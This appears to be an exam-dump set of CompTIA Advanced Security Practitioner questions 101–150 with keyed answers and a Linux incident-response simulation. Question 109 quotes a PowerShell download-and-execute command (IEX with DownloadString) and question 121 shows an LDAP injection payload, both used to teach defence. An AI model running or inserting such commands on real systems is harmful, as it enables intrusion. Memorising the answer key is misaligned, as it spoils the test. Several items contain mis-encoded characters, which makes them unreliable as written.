CompTIA Advanced Security Practitioner Topic 3
Question #: 101
Topic #: 1
Which of the following is the MOST important cloud-specific risk from the CSP’s viewpoint?
A. Isolation control failure
B. Management plane breach
C. Insecure data deletion
D. Resource exhaustion
Hint Answer: B
Question #: 102
Topic #: 1
An organization is developing a disaster recovery plan that requires data to be backed up and available at a moment’s notice.
Which of the following should the organization consider FIRST to address this requirement?
A. Implement a change management plan to ensure systems are using the appropriate versions.
B. Hire additional on-call staff to be deployed if an event occurs.
C. Design an appropriate warm site for business continuity.
D. Identify critical business processes and determine associated software and hardware requirements.
Hint Answer: D
Question #: 103
Topic #: 1
Leveraging cryptographic solutions to protect data that is in use ensures the data is encrypted:
A. when it is passed across a local network.
B. in memory during processing
C. when it is written to a system’s solid-state drive.
D. by an enterprise hardware security module.
Hint Answer: B
Question #: 104
Topic #: 1
A Chief Information Officer (CIO) wants to implement a cloud solution that will satisfy the following requirements:
✑ Support all phases of the SDLC.
✑ Use tailored website portal software.
✑ Allow the company to build and use its own gateway software.
✑ Utilize its own data management platform.
✑ Continue using agent-based security tools.
Which of the following cloud-computing models should the CIO implement?
A. SaaS
B. PaaS
C. MaaS
D. IaaS
Hint Answer: B
Question #: 105
Topic #: 1
A security analyst detected a malicious PowerShell attack on a single server. The malware used the Invoke-Expression function to execute an external malicious script. The security analyst scanned the disk with an antivirus application and did not find any IOCs. The security analyst now needs to deploy a protection solution against this type of malware.
Which of the following BEST describes the type of malware the solution should protect against?
A. Worm
B. Logic bomb
C. Fileless
D. Rootkit
Hint Answer: C
Question #: 106
Topic #: 1
A development team created a mobile application that contacts a company’s back-end APIs housed in a PaaS environment. The APIs have been experiencing high processor utilization due to scraping activities. The security engineer needs to recommend a solution that will prevent and remedy the behavior.
Which of the following would BEST safeguard the APIs? (Choose two.)
A. Bot protection
B. OAuth 2.0
C. Input validation
D. Autoscaling endpoints
E. Rate limiting
F. CSRF protection
Hint Answer: AE
Question #: 107
Topic #: 1
An organization’s existing infrastructure includes site-to-site VPNs between datacenters. In the past year, a sophisticated attacker exploited a zero-day vulnerability on the VPN concentrator. Consequently, the Chief Information Security Officer (CISO) is making infrastructure changes to mitigate the risk of service loss should another zero-day exploit be used against the VPN solution.
Which of the following designs would be BEST for the CISO to use?
A. Adding a second redundant layer of alternate vendor VPN concentrators
B. Using Base64 encoding within the existing site-to-site VPN connections
C. Distributing security resources across VPN sites
D. Implementing IDS services with each VPN concentrator
E. Transitioning to a container-based architecture for site-based services
Hint Answer: A
Question #: 108
Topic #: 1
A local government that is investigating a data exfiltration claim was asked to review the fingerprint of the malicious user’s actions. An investigator took a forensic image of the VM and downloaded the image to a secured USB drive to share with the government.
Which of the following should be taken into consideration during the process of releasing the drive to the government?
A. Encryption in transit
B. Legal issues
C. Chain of custody
D. Order of volatility
E. Key exchange
Hint Answer: C
Question #: 109
Topic #: 1
A security analyst has noticed a steady increase in the number of failed login attempts to the external-facing mail server. During an investigation of one of the jump boxes, the analyst identified the following in the log file: powershell `IEX(New-Object Net.WebClient).DownloadString (‘https://content.comptia.org/casp/whois.psl’);whois`
Which of the following security controls would have alerted and prevented the next phase of the attack?
A. Antivirus and UEBA
B. Reverse proxy and sandbox
C. EDR and application approved list
D. Forward proxy and MFA
Hint Answer: C
Question #: 110
Topic #: 1
As part of its risk strategy, a company is considering buying insurance for cybersecurity incidents.
Which of the following BEST describes this kind of risk response?
A. Risk rejection
B. Risk mitigation
C. Risk transference
D. Risk avoidance
Hint Answer: C
Question #: 111
Topic #: 1
A DevOps team has deployed databases, event-driven services, and an API gateway as PaaS solution that will support a new billing system.
Which of the following security responsibilities will the DevOps team need to perform?
A. Securely configure the authentication mechanisms.
B. Patch the infrastructure at the operating system.
C. Execute port scanning against the services.
D. Upgrade the service as part of life-cycle management.
Hint Answer: A
Question #: 112
Topic #: 1
A company’s Chief Information Officer wants to implement IDS software onto the current system’s architecture to provide an additional layer of security. The software must be able to monitor system activity, provide information on attempted attacks, and provide analysis of malicious activities to determine the processes or users involved.
Which of the following would provide this information?
A. HIPS
B. UEBA
C. HIDS
D. NIDS
Hint Answer: C
Question #: 113
Topic #: 1
The Chief Information Security Officer of a startup company has asked a security engineer to implement a software security program in an environment that previously had little oversight.
Which of the following testing methods would be BEST for the engineer to utilize in this situation?
A. Software composition analysis
B. Code obfuscation
C. Static analysis
D. Dynamic analysis
Hint Answer: D
Question #: 114
Topic #: 1
A forensic investigator would use the foremost command for:
A. cloning disks.
B. analyzing network-captured packets.
C. recovering lost files.
D. extracting features such as email addresses.
Hint Answer: C
Question #: 115
Topic #: 1
A software company is developing an application in which data must be encrypted with a cipher that requires the following:
✑ Initialization vector
✑ Low latency
✑ Suitable for streaming
Which of the following ciphers should the company use?
A. Cipher feedback
B. Cipher block chaining message authentication code
C. Cipher block chaining
D. Electronic codebook
Hint Answer: A
Question #: 116
Topic #: 1
An organization that provides a SaaS solution recently experienced an incident involving customer data loss. The system has a level of self-healing that includes monitoring performance and available resources. When the system detects an issue, the self-healing process is supposed to restart parts of the software.
During the incident, when the self-healing system attempted to restart the services, available disk space on the data drive to restart all the services was inadequate. The self-healing system did not detect that some services did not fully restart and declared the system as fully operational.
Which of the following BEST describes the reason why the silent failure occurred?
A. The system logs rotated prematurely.
B. The disk utilization alarms are higher than what the service restarts require.
C. The number of nodes in the self-healing cluster was healthy.
D. Conditional checks prior to the service restart succeeded.
Hint Answer: D
Question #: 117
Topic #: 1
A security consultant needs to set up wireless security for a small office that does not have Active Directory. Despite the lack of central account management, the office manager wants to ensure a high level of defense to prevent brute-force attacks against wireless authentication.
Which of the following technologies would BEST meet this need?
A. Faraday cage
B. WPA2 PSK
C. WPA3 SAE
D. WEP 128 bit
Hint Answer: C
Question #: 118
Topic #: 1
An attack team performed a penetration test on a new smart card system. The team demonstrated that by subjecting the smart card to high temperatures, the secret key could be revealed.
Which of the following side-channel attacks did the team use?
A. Differential power analysis
B. Differential fault analysis
C. Differential temperature analysis
D. Differential timing analysis
Hint Answer: B
Question #: 119
Topic #: 1
A security compliance requirement states that specific environments that handle sensitive data must be protected by need-to-know restrictions and can only connect to authorized endpoints. The requirement also states that a DLP solution within the environment must be used to control the data from leaving the environment.
Which of the following should be implemented for privileged users so they can support the environment from their workstations while remaining compliant?
A. NAC to control authorized endpoints
B. FIM on the servers storing the data
C. A jump box in the screened subnet
D. A general VPN solution to the primary network
Hint Answer: C
Question #: 120
Topic #: 1
A networking team was asked to provide secure remote access to all company employees. The team decided to use client-to-site VPN as a solution. During a discussion, the Chief Information Security Officer raised a security concern and asked the networking team to route the Internet traffic of remote users through the main office infrastructure. Doing this would prevent remote users from accessing the Internet through their local networks while connected to the VPN.
Which of the following solutions does this describe?
A. Full tunneling
B. Asymmetric routing
C. SSH tunneling
D. Split tunneling
Hint Answer: A
Question #: 121
Topic #: 1
A security analyst discovered that the company’s WAF was not properly configured. The main web server was breached, and the following payload was found in one of the malicious requests:
(&(objectClass=*)(objectClass=*))(&(objectClass=void)(type=admin))
Which of the following would BEST mitigate this vulnerability?
A. Network intrusion prevention
B. Data encoding
C. Input validation
D. CAPTCHA
Hint Answer: C
Question #: 122
Topic #: 1
A security consultant needs to protect a network of electrical relays that are used for monitoring and controlling the energy used in a manufacturing facility.
Which of the following systems should the consultant review before making a recommendation?
A. CAN
B. ASIC
C. FPGA
D. SCADA
Hint Answer: D
Question #: 123
Topic #: 1
Company A acquired Company ׀’. During an audit, a security engineer found Company B’s environment was inadequately patched. In response, Company A placed a firewall between the two environments until Company B’s infrastructure could be integrated into Company A’s security program.
Which of the following risk-handling techniques was used?
A. Accept
B. Avoid
C. Transfer
D. Mitigate
Hint Answer: D
Question #: 124
Topic #: 1
An organization is prioritizing efforts to remediate or mitigate risks identified during the latest assessment. For one of the risks, a full remediation was not possible, but the organization was able to successfully apply mitigations to reduce the likelihood of impact.
Which of the following should the organization perform NEXT?
A. Assess the residual risk.
B. Update the organization’s threat model.
C. Move to the next risk in the register.
D. Recalculate the magnitude of impact.
Hint Answer: A
Question #: 125
Topic #: 1
A software house is developing a new application. The application has the following requirements:
✑ Reduce the number of credential requests as much as possible
✑ Integrate with social networks
✑ Authenticate users
Which of the following is the BEST federation method to use for the application?
A. WS-Federation
B. OpenID
C. OAuth
D. SAML
Hint Answer: B
Question #: 126
Topic #: 1
A company is looking for a solution to hide data stored in databases. The solution must meet the following requirements:
✑ Be efficient at protecting the production environment
✑ Not require any change to the application
✑ Act at the presentation layer
Which of the following techniques should be used?
A. Masking
B. Tokenization
C. Algorithmic
D. Random substitution
Hint Answer: A
Question #: 127
Topic #: 1
A forensic expert working on a fraud investigation for a US-based company collected a few disk images as evidence.
Which of the following offers an authoritative decision about whether the evidence was obtained legally?
A. Lawyers
B. Court
C. Upper management team
D. Police
Hint Answer: B
Question #: 128
Topic #: 1
Technicians have determined that the current server hardware is outdated, so they have decided to throw it out.
Prior to disposal, which of the following is the BEST method to use to ensure no data remnants can be recovered?
A. Drive wiping
B. Degaussing
C. Purging
D. Physical destruction
Hint Answer: D
Question #: 129
Topic #: 1
A penetration tester obtained root access on a Windows server and, according to the rules of engagement, is permitted to perform post-exploitation for persistence.
Which of the following techniques would BEST support this?
A. Configuring systemd services to run automatically at startup
B. Creating a backdoor
C. Exploiting an arbitrary code execution exploit
D. Moving laterally to a more authoritative server/service
Hint Answer: B
Question #: 130
Topic #: 1
A security architect for a large, multinational manufacturer needs to design and implement a security solution to monitor traffic.
When designing the solution, which of the following threats should the security architect focus on to prevent attacks against the ׀׀¢ network?
A. Packets that are the wrong size or length
B. Use of any non-DNP3 communication on a DNP3 port
C. Multiple solicited responses over time
D. Application of an unsupported encryption algorithm
Hint Answer: B
Question #: 131
Topic #: 1
A security administrator configured the account policies per security implementation guidelines. However, the accounts still appear to be susceptible to brute-force attacks. The following settings meet the existing compliance guidelines:
✑ Must have a minimum of 15 characters
✑ Must use one number
✑ Must use one capital letter
✑ Must not be one of the last 12 passwords used
Which of the following policies should be added to provide additional security?
A. Shared accounts
B. Password complexity
C. Account lockout
D. Password history
E. Time-based logins
Hint Answer: C
Question #: 132
Topic #: 1
A cybersecurity analyst discovered a private key that could have been exposed.
Which of the following is the BEST way for the analyst to determine if the key has been compromised?
A. HSTS
B. CRL
C. CSRs
D. OCSP
Hint Answer: D
Question #: 133
Topic #: 1
Which of the following technologies allows CSPs to add encryption across multiple data storages?
A. Symmetric encryption
B. Homomorphic encryption
C. Data dispersion
D. Bit splitting
Hint Answer: D
Question #: 134
Topic #: 1
A vulnerability scanner detected an obsolete version of an open-source file-sharing application on one of a company’s Linux servers. While the software version is no longer supported by the OSS community, the company’s Linux vendor backported fixes, applied them for all current vulnerabilities, and agrees to support the software in the future.
Based on this agreement, this finding is BEST categorized as a:
A. true positive.
B. true negative.
C. false positive.
D. false negative.
Hint Answer: A
Question #: 135
Topic #: 1
A company’s Chief Information Security Officer is concerned that the company’s proposed move to the cloud could lead to a lack of visibility into network traffic flow logs within the VPC.
Which of the following compensating controls would be BEST to implement in this situation?
A. EDR
B. SIEM
C. HIDS
D. UEBA
Hint Answer: B
Question #: 136
Topic #: 1
A security team received a regulatory notice asking for information regarding collusion and pricing from staff members who are no longer with the organization.
The legal department –
provided the security team with a list of search terms to investigate.
This is an example of:
A. due diligence.
B. e-discovery.
C. due care.
D. legal hold.
Hint Answer: B
Question #: 137
Topic #: 1
Which of the following protocols is a low power, low data rate that allows for the creation of PAN networks?
A. Zigbee
B. CAN
C. DNP3
D. Modbus
Hint Answer: A
Question #: 138
Topic #: 1
An organization’s assessment of a third-party, non-critical vendor reveals that the vendor does not have cybersecurity insurance and IT staff turnover is high. The organization uses the vendor to move customer office equipment from one service location to another. The vendor acquires customer data and access to the business via an API.
Given this information, which of the following is a noted risk?
A. Feature delay due to extended software development cycles
B. Financial liability from a vendor data breach
C. Technical impact to the API configuration
D. The possibility of the vendor’s business ceasing operations
Hint Answer: B
Question #: 139
Topic #: 1
A company wants to quantify and communicate the effectiveness of its security controls but must establish measures. Which of the following is MOST likely to be included in an effective assessment roadmap for these controls?
A. Create a change management process.
B. Establish key performance indicators.
C. Create an integrated master schedule.
D. Develop a communication plan.
E. Perform a security control assessment.
Hint Answer: B
Question #: 140
Topic #: 1
A bank is working with a security architect to find the BEST solution to detect database management system compromises. The solution should meet the following requirements:
✑ Work at the application layer
✑ Send alerts on attacks from both privileged and malicious users
✑ Have a very low false positive
Which of the following should the architect recommend?
A. FIM
B. WAF
C. NIPS
D. DAM
E. UTM
Hint Answer: D
Question #: 141
Topic #: 1
A business wants to migrate its workloads from an exclusively on-premises IT infrastructure to the cloud but cannot implement all the required controls. Which of the following BEST describes the risk associated with this implementation?
A. Loss of governance
B. Vendor lockout
C. Compliance risk
D. Vendor lock-in
Hint Answer: A
Question #: 142
Topic #: 1
A security architect needs to implement a CASB solution for an organization with a highly distributed remote workforce. One of the requirements for the implementation includes the capability to discover SaaS applications and block access to those that are unapproved or identified as risky. Which of the following would BEST achieve this objective?
A. Deploy endpoint agents that monitor local web traffic to enforce DLP and encryption policies.
B. Implement cloud infrastructure to proxy all user web traffic to enforce DLP and encryption policies.
C. Implement cloud infrastructure to proxy all user web traffic and control access according to centralized policy.
D. Deploy endpoint agents that monitor local web traffic and control access according to centralized policy.
Hint Answer: C
Question #: 143
Topic #: 1
During a phishing exercise, a few privileged users ranked high on the failure list. The enterprise would like to ensure that privileged users have an extra security- monitoring control in place. Which of the following is the MOST likely solution?
A. A WAF to protect web traffic
B. User and entity behavior analytics
C. Requirements to change the local password
D. A gap analysis
Hint Answer: B
Question #: 144
Topic #: 1
An analyst is evaluating the security of a web application that does not hold sensitive or financial data. The application requires users to have a minimum password length of 12 characters. One of the characters must be capitalized, and one must be a number. To reset the password, the user is asked to provide the birthplace, birthdate, and mother’s maiden name. When all of these are entered correctly, a new password is emailed to the user. Which of the following should concern the analyst the MOST?
A. The security answers may be determined via online reconnaissance.
B. The password is too long, which may encourage users to write the password down.
C. The password should include a special character.
D. The minimum password length is too short.
Hint Answer: A
Question #: 145
Topic #: 1
In a cloud environment, the provider offers relief to an organization’s teams by sharing in many of the operational duties. In a shared responsibility model, which of the following responsibilities belongs to the provider in a PaaS implementation?
A. Application-specific data assets
B. Application user access management
C. Application-specific logic and code
D. Application/platform software
Hint Answer: D
Question #: 146
Topic #: 1
SIMULATION –
You are about to enter the virtual environment.
Once you have completed the item in the virtual environment, you will NOT be allowed to return to this item.
Click Next to continue.
Question and Instructions –
DO NOT perform the following actions within the virtual environment. Making any of these changes will cause the virtual environment to fail and prevent proper scoring.
1. Disabling ssh
2. Disabling systemd
3. Altering the network adapter 172.162.0.0
4. Changing the password in the lab admin account
Once you have completed the item in the virtual environment. you will NOT be allowed to return to this item.
TEST QUESTION –
This system was recently patched following the exploitation of a vulnerability by an attacker to enable data exfiltration.
Despite the vulnerability being patched, it is likely that a malicious TCP service is still running and the adversary has achieved persistence by creating a systemd service.
Examples of commands to use:
kill, killall
lsof
man, –help (use for assistance)
netstat (useful flags: a, n, g, u)
ps (useful flag: a)
systemctl (to control systemd)
Please note: the list of commands shown above is not exhaustive. All native commands are available.
INSTRUSTIONS –
Using the following credentials:
Username: labXXXadmin –
Password: XXXyyYzz!
Investigate to identify indicators of compromise and then remediate them. You will need to make at least two changes:
1. End the compromised process that is using a malicious TCP service.
2. Remove the malicious persistence agent by disabling the service’s ability to start on boot.
Question #: 147
Topic #: 1
An analyst received a list of IOCs from a government agency. The attack has the following characteristics:
1. The attack starts with bulk phishing.
2. If a user clicks on the link, a dropper is downloaded to the computer.
3. Each of the malware samples has unique hashes tied to the user.
The analyst needs to identify whether existing endpoint controls are effective. Which of the following risk mitigation techniques should the analyst use?
A. Update the incident response plan.
B. Blocklist the executable.
C. Deploy a honeypot onto the laptops.
D. Detonate in a sandbox.
Hint Answer: D
Question #: 148
Topic #: 1
An organization’s finance system was recently attacked. A forensic analyst is reviewing the contents of the compromised files for credit card data. Which of the following commands should the analyst run to BEST determine whether financial data was lost?
A. grep ג€”v ‘^4 [0ג€”9] {12} (?:[0ג€”9]{3}) ?$’ file
B. grep ‘^4 [0ג€”9]{12}(?:[0ג€”9]{3})?$’ file
C. grep ‘^6(?:011|5[0ג€”9]{2}) [0ג€”9] {12} ?’ file
D. grep ג€”v ‘^6(?:011|5[0ג€”9]{2})[0ג€”9]{12}?’ file
Hint Answer: B
Question #: 149
Topic #: 1
An organization requires a contractual document that includes:
✑ An overview of what is covered
✑ Goals and objectives
✑ Performance metrics for each party
✑ A review of how the agreement is managed by all parties
Which of the following BEST describes this type of contractual document?
A. SLA
B. BAA
C. NDA
D. ISA
Hint Answer: A
Question #: 150
Topic #: 1
A company based in the United States holds insurance details of EU citizens. Which of the following must be adhered to when processing EU citizens’ personal, private, and confidential data?
A. The principle of lawful, fair, and transparent processing
B. The right to be forgotten principle of personal data erasure requests
C. The non-repudiation and deniability principle
D. The principle of encryption, obfuscation, and data masking
Hint Answer: A
